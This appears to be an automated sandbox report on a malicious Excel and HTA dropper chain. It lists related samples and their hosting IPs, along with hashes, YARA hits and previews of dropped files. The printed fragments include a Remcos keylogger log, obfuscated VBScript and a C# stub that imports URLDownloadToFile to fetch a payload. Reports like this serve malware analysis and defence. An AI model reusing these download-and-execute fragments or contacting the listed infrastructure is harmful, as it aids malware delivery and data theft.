HUMBER-COLLEGECA | kissmegoodthingwhichgivemebestthignswithgirluaremy.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 142.215.209.78
HUMBER-COLLEGECA | bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer | 142.215.209.78
HUMBER-COLLEGECA | Purchase order (1).xls | malicious | HTMLPhisher, Lokibot | 142.215.209.78
AS-COLOCROSSINGUS | Transferencia SPEI.xls | malicious | FormBook, HTMLPhisher | 107.173.4.61
AS-COLOCROSSINGUS | seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | 192.3.22.13
AS-COLOCROSSINGUS | greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 192.3.243.136
AS-COLOCROSSINGUS | Credit_DetailsCBS24312017918.xla.xlsx | malicious | HTMLPhisher | 172.245.123.3
AS-COLOCROSSINGUS | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 192.3.243.136
AS-COLOCROSSINGUS | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 192.3.22.13
AS-COLOCROSSINGUS | 9srIKeD54O.rtf | malicious | Unknown | 192.3.101.150
AS-COLOCROSSINGUS | exe009.exe | malicious | Emotet | 75.127.14.170
AS-COLOCROSSINGUS | bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta | malicious | Cobalt Strike, HTMLPhisher, SmokeLoader | 107.172.44.178
AS-COLOCROSSINGUS | givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 192.3.243.136
RIDLEYSD-NETUS | Transferencia SPEI.xls | malicious | FormBook, HTMLPhisher | 198.244.140.41
RIDLEYSD-NETUS | PO-000041492.docx.doc | malicious | Lokibot | 198.244.140.41
RIDLEYSD-NETUS | Credit_DetailsCBS24312017918.xla.xlsx | malicious | HTMLPhisher | 198.244.140.41
RIDLEYSD-NETUS | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 198.244.140.41
RIDLEYSD-NETUS | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 198.244.140.41
RIDLEYSD-NETUS | nabspc.elf | malicious | Unknown | 198.244.7.173
RIDLEYSD-NETUS | https://instagrambeta.github.io/ | malicious | HTMLPhisher | 198.244.231.90
RIDLEYSD-NETUS | SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exe | malicious | Unknown | 198.244.179.42
RIDLEYSD-NETUS | Informations.bat | malicious | PureLog Stealer, XWorm | 198.244.206.37
RIDLEYSD-NETUS | Beopajki.exe | malicious | HVNC, PureLog Stealer, XWorm | 198.244.206.37
Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | PO-000041492.docx.doc | malicious | Lokibot | 142.215.209.78
05af1f5ca1b87cc9cc9b25185115607d | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 142.215.209.78
05af1f5ca1b87cc9cc9b25185115607d | Xkl0PnD8zFPjfh1.wiz.rtf | malicious | Snake Keylogger, VIP Keylogger | 142.215.209.78
05af1f5ca1b87cc9cc9b25185115607d | #U3010TW-S PO#U3011PO#3311-20241118003.xls | malicious | HTMLPhisher, SmokeLoader | 142.215.209.78
05af1f5ca1b87cc9cc9b25185115607d | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 142.215.209.78
05af1f5ca1b87cc9cc9b25185115607d | INV-#000497053.doc | malicious | Unknown | 142.215.209.78
05af1f5ca1b87cc9cc9b25185115607d | Purchase order (1).xls | malicious | HTMLPhisher, Lokibot | 142.215.209.78
05af1f5ca1b87cc9cc9b25185115607d | Purchase order (2).xls | malicious | HTMLPhisher, Lokibot | 142.215.209.78
05af1f5ca1b87cc9cc9b25185115607d | Document.xla.xlsx | malicious | FormBook, HTMLPhisher | 142.215.209.78
05af1f5ca1b87cc9cc9b25185115607d | http://xoilacxd.cc | malicious | Unknown | 142.215.209.78
7dcce5b76c8b17472d024758970a406b | Transferencia SPEI.xls | malicious | FormBook, HTMLPhisher | 198.244.140.41
7dcce5b76c8b17472d024758970a406b | PO-000041492.docx.doc | malicious | Lokibot | 198.244.140.41
7dcce5b76c8b17472d024758970a406b | Credit_DetailsCBS24312017918.xla.xlsx | malicious | HTMLPhisher | 198.244.140.41
7dcce5b76c8b17472d024758970a406b | PO-000041492.xls | malicious | Unknown | 198.244.140.41
7dcce5b76c8b17472d024758970a406b | Credit_DetailsCBS24312017915.xla.xlsx | malicious | Unknown | 198.244.140.41
7dcce5b76c8b17472d024758970a406b | PO-000041492.xls | malicious | Unknown | 198.244.140.41
7dcce5b76c8b17472d024758970a406b | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 198.244.140.41
7dcce5b76c8b17472d024758970a406b | Credit_DetailsCBS24312017915.xla.xlsx | malicious | Unknown |
                                                                                                            • 198.244.140.41
                                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            PO-73375.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 198.244.140.41
                                                                                                            No context

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: data
Category: dropped
Size (bytes): 244
Entropy (8bit): 3.479567364166589
Encrypted: false
SSDEEP: 3:rhlKlf4OlVlNpPWl5JWRal2Jl+7R0DAlBG4XOylRflgHtl1eWFredn1xlfaX8klb:6lfJlPNpK5YcIeeDAlTyFwfxNa/WAv
MD5: 3F72C4DC2F31D5081038E7DA1DF650F3
SHA1: 9EA37AA45BAF28F1D8DC49181C7A16CDE495AE34
SHA-256: E2F33DA3D38FC85B63118F1039780F80C0777AC5F8E44F31D2495E2B40728D7D
SHA-512: 96D789F09771E32F5B95AC2894AAA27D1E3ADBF61DED5C5C68E3F781F09E16C8FD9661C09BE8A755CCF458167ED69306E9E20300EF387A9869DE81D3A3E34354
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview: ....[.2.0.2.4./.1.1./.2.0. .1.0.:.5.8.:.1.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 4742
Entropy (8bit): 4.8105940880640246
Encrypted: false
SSDEEP: 96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
MD5: 278C40A9A3B321CA9147FFBC6BE3A8A8
SHA1: D795FC7D3249F9D924DC951DA1DB900D02496D73
SHA-256: 4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
SHA-512: E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
Malicious: false
Preview: PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines (65536), with no line terminators
Category: modified
Size (bytes): 368862
Entropy (8bit): 2.4734616558553384
Encrypted: false
SSDEEP: 192:436mm7epKXV0b8ECbC/lepKXV0b8LCbC/+UepKXV0b8GepKXV0b89CbC/yepKXVl:Y65Cb
MD5: 35B8D63EAD2EB58B7ED815BE7BCBF97F
SHA1: 88AE189165C612CC11E3A83CE322363698E21DAF
SHA-256: 886699A7B1F864A18F767B1F3C95D860BCED175C6E9BF2A5186119B698B5DE23
SHA-512: 047BFD03280A842C6527D4A0C41E2D593D3222D4617152FEBED39120184BE179A36F99374C8BCA7724B11DC78C8AF202A14F63E7DFE87FEFC53FFB510440FCDE
Malicious: true
Yara Hits:
• Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta, Author: Joe Security

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
Category: dropped
Size (bytes): 142466
Entropy (8bit): 3.674082413060924
Encrypted: false
SSDEEP: 1536:41jUPF8/vqjQ2AMYdCZc1uIj9X0EBz4jfOMaTUfgt5pzGGwm:VdkvqjQ2ArCjIB0k4jfOMaTsgt5pCGwm
MD5: DA5A2B2A39D7AB8B9F9ADF8AF69A5F61
SHA1: 7588E7A25BF351AC5A16ECA9B68686C7970E60E5
SHA-256: 99D85E0AB098EFE5FF79ED0F26F5543BE8D9DC316132A80BA72001CCA355E89F
SHA-512: D042E1BA33995BA500DD91218AAAB47310B31AEFA91862F744719EA659EB235080DE25649E50AED2ECE84C1AFF78C25BEE6B8DBE5C680AFFA925516F61F95D8A
Malicious: false
Preview: ..........F.u.n.c.t.i.o.n. .r.e.s.t.i.v.o.(.B.y.V.a.l. .a.m.b.a.r.i.n.o.,. .B.y.V.a.l. .p.n.e.o.m.e.t.r.i.a.,. .B.y.V.a.l. .c.o.n.t.r.a.m.a.r.t.e.l.o.s.)..... . . . .D.i.m. .e.s.f.a.l.f.a.m.e.n.t.o..... . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .e.s.f.a.l.f.a.m.e.n.t.o. .>. .0..... . . . . . . . .a.m.b.a.r.i.n.o. .=. .L.e.f.t.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .-. .1.). .&. .c.o.n.t.r.a.m.a.r.t.e.l.o.s. .&. .M.i.d.(.a.m.b.a.r.i.n.o.,. .e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.p.n.e.o.m.e.t.r.i.a.).)..... . . . . . . . .e.s.f.a.l.f.a.m.e.n.t.o. .=. .I.n.S.t.r.(.e.s.f.a.l.f.a.m.e.n.t.o. .+. .L.e.n.(.c.o.n.t.r.a.m.a.r.t.e.l.o.s.).,. .a.m.b.a.r.i.n.o.,. .p.n.e.o.m.e.t.r.i.a.)..... . . . .L.o.o.p..... . . . ..... . . . .r.e.s.t.i.v.o. .=. .a.m.b.a.r.i.n.o.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.015105568788186
Encrypted: false
SSDEEP: 12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 8937B63DC0B37E949F38E7874886D999
SHA1: 62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
SHA-256: AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
SHA-512: 077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
Malicious: false
Preview: {. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 7440
Entropy (8bit): 5.6312448977812695
Encrypted: false
SSDEEP: 96:PV1Ipi7blJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHDx:PVxvTNAK4oOIGbK1RvVwPAWmOHDx
MD5: DEA1DEA8BEA479821FA2AC1C565B6E56
SHA1: 86865637336A9FEFA98AC5ABD189A848BE8852D4
SHA-256: 64832E2264B5A851EE2CC7E048DA437D6F41B1C3DCAA385971DAA1B502A11125
SHA-512: 1E1858F58748BF88DAB254F524943AC2C8576B4546AA67E37DFFE8917396A1CCCBA3964554AA77C599DD1CA184A56B8AFC3406A14C880A1B88D163EB04BACA1C
Malicious: false

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 3191264
Entropy (8bit): 2.0118490192617995
Encrypted: false
SSDEEP: 6144:nA0Ki15RlURvLuky+NkuCVAKERludvLuk0Vgk9CVnOKAOK1:P5RlMHk5ERlyDkr8a
MD5: 04A17584C7203C47419D4AC2163B98C6
SHA1: 485E17A82AE4672AC8D4B542CA0F509B80C0C4DF
SHA-256: EBA2B7C929B2EAA16FB1F733B7ACDDDFD80635A7211B3FBE400FF2796C17827E
SHA-512: 043092951F27E81FF96DA084E8112107D6F00DAEE83ADA80132BEC696E56309D16FDDED39F7F3810CA58BB6357CC6A75718CDD2F7B4342CF82D0421B7681A88C
Malicious: false

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 1504468
Entropy (8bit): 1.7693060102813485
Encrypted: false
SSDEEP: 3072:L+6i9zy7v2/uEB1A/meRlmRYT9FANxg2WUZUKdRLuk0VgHPLk9CVi:LKERludvLuk0Vgk9CVi
MD5: EF3C18CC49B02153C770DB977B2E7435
SHA1: D436E0F820DDBBA10DB4D3F1243ED3AA6468C057
SHA-256: F328FB5B6055B687344190BB13D8DD6CDF6EA76D4AAAE6C5112DEC1B32ACE3C2
SHA-512: 2081EF5EE87A360894B8726494F30DFEEFF7D922E733D2E633A3D010DE56C6A4CAEADEEBE4CD12A28658AE250ADE3B093F2FAB032B92A31D511D9C99A12AF337
Malicious: false

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 1296688
Entropy (8bit): 3.5916724080620157
Encrypted: false
SSDEEP: 6144:44oL3s01u2uIfTlw35Ydkndm9wHiT53ZkyOmCl6PV2yuxOKiOKC:obWQTi35RH1RW7vuZ
MD5: 2D3AE0FA9EAFCE304E2CD3E3B45AC0FF
SHA1: 5FC59DC274A81DBF0CCB3AFFEAD2B1AE2095531C
SHA-256: C1133F5EFED7990EE2339FCE42ADE9B6CEF454B29616881D9E8605B8AD9D8C23
SHA-512: 58E62F40FBD670FBC931180871DF3313EB50A0BE4B1BA0DC19BBC52B7D2FFC9CD71834DAFDA7F285FAD60DE86D95D1248B5424C9CC53341B14EA3CC2450BE08A
Malicious: false
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):3064680
Entropy (8bit):1.8507381356738084
Encrypted:false
SSDEEP:6144:NaeRlcBvLukyV6kTCVQKERludvLuk0Vgk9CVX:oeRlM7kmERlyDku
MD5:93774BB9AECD3837D6496AE965D1BD80
SHA1:AE60D6A30E74BB5BE492CA71B82205D5C6B850C4
SHA-256:6CDB58A3C6906A6DD49DB83340ACC7AF0B7C7BBA5C01D8B0A9F562AEBDC85897
SHA-512:3810C4CDE003BAF916D626A41C0534BF421F5CDBF64D897F385FEDA36F556B6FECC27DB294A39F89C82DF0570424DE2EBB789E0B2294D42BFF80A64756257BD6
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Microsoft Excel 2007+
Category:dropped
Size (bytes):24052
Entropy (8bit):7.652425367216495
Encrypted:false
SSDEEP:384:EaNYaTXe5BPJ2cpRYnyAt3TtsVaWtmGJA8+6qdPGlDLRoucPQFVJG:Ea6aje5BP7RMYt9h44wQFV4
MD5:AE24ADB29E22854D176245019B60E937
SHA1:28E9F74782AA0D138EE52E3191248F827BF27A1D
SHA-256:5BF5C455288A0B5184B23744506939B604BF402E346AFAE18269BBE888412129
SHA-512:10AE2624E874CBA663DA08AA0C0FEBE19421FD01F72D54957F22A028A58A33BD4078C6A9CCA7CDAB94FC59030894BEA018141E6920AF4E926155C7EE49B6507D
Malicious:false
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:gAWY3n:qY3n
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:false
Preview:[ZoneTransfer]..ZoneId=3..
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 15:58:00 2024, 1st section name ".debug$S"
Category:dropped
Size (bytes):1328
Entropy (8bit):3.985420906621664
Encrypted:false
SSDEEP:24:H+e9EurUfGtdHFwKdNWI+ycuZhNgakSsPNnqSqd:rrUe7GKd41ulga38qSK
MD5:62DBA3F12F44BC72E408A860C5E5C2BC
SHA1:3A493861CCA82D52D4BC5138C30C68B41C373781
SHA-256:8F78E0D21BA155D757A2C273CC25B8323F811ACE540607EEFBDCCDAB43C1F9B6
SHA-512:9D6AB09520D24B1FA35BC88A446045A29FF65F83E9C75928924E88ECCB8F4E6A80ED4DF2E6548BC139F314AFA9E22C022A0B1817585711E272154957250671E2
Malicious:false
Preview:L.....>g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP.................E..r...t.oK..n...........4.......C:\Users\user\AppData\Local\Temp\RES1F34.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.i.j.x.x.v.a.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 15:57:33 2024, 1st section name ".debug$S"
Category:dropped
Size (bytes):1328
Entropy (8bit):4.004496986956877
Encrypted:false
SSDEEP:24:HIe9E2UT8ndH8wKdNWI+ycuZhNOCPakSBCoPNnqSqd:wTkjKd41ulOoa3BnqSK
MD5:D23B5631B68D9489B09E847123DE4AF7
SHA1:61AECEC2228186004976B5DF7F85BCB426DEF0B4
SHA-256:EFADE8FB96E32274C68083C19586F6BD771C19771BA134754A3D092E399429EE
SHA-512:A0BCE3EE53085A70ED1548EC19AC84E2B017928E1B2D77A0D78C23BD2A824D4AAE36A97E1CF1D6801CF6AC63CBD61B6CCF28769E6056C73EB403C8F172F80B2F
Malicious:false
Preview:L.....>g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP..................#....Gy.._x:..........4.......C:\Users\user\AppData\Local\Temp\RESB76D.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.v.g.u.m.1.l.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:MSVC .res
                                                                                                            Category:dropped
                                                                                                            Size (bytes):652
                                                                                                            Entropy (8bit):3.1055279920328136
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygCPak7YnqqBCoPN5Dlq5J:+RI+ycuZhNOCPakSBCoPNnqX
                                                                                                            MD5:CEFD8F238DD896D10247798B895F783A
                                                                                                            SHA1:C894F80FD7C709F13F0324E1B0CC695F433F1116
                                                                                                            SHA-256:D1612E240D43D1D48D94D36C4F69721352B6105B724527AFFAB1CB9418BC4AED
                                                                                                            SHA-512:0BE5D4420B2E76EEEB1C8A1E6452B639B74E197DB974A9FC88D786AAD75035731D7D5314DE82FA1ADB72F357F66957E651CAC5B4D4FC9016B1B71580409A7C26
                                                                                                            Malicious:false
                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.v.g.u.m.1.l.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.v.g.u.m.1.l.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):487
                                                                                                            Entropy (8bit):3.787386295423015
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:V/DsYLDS81zuA3Q88NemMGlBHjQXReKJ8SRHy4HpuyCrK6P6gYy:V/DTLDfuJNeKuXfHnCBbYy
                                                                                                            MD5:920EC087C1649B37D3E112B3D5CEB653
                                                                                                            SHA1:43582D6BD4F01B5585CDE7DFF378FA59D38E7F7F
                                                                                                            SHA-256:D0C9B5992704CAA64BB5429349502AE370A05E995CFE05650EE7ECC4142E5BAA
                                                                                                            SHA-512:C79F661748E9176F0F01D405530C4704C7AAB611C2D614F537EA7A7778C846A98A6156DD1F35BBE5AB5644D9C582C1DE6D859925040C7A78AA44D21C19FFC673
                                                                                                            Malicious:false
                                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace IrRz.{. public class iAywni. {. [DllImport("urLMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr TckVLj,string VIV,string EXlnPJrpNQc,uint bEjz,IntPtr yZVSsDMddO);.. }..}.
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):369
                                                                                                            Entropy (8bit):5.2526591390810164
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fy2+zxs7+AEszIP23fysn:p37Lvkmb6KzH+WZEoT
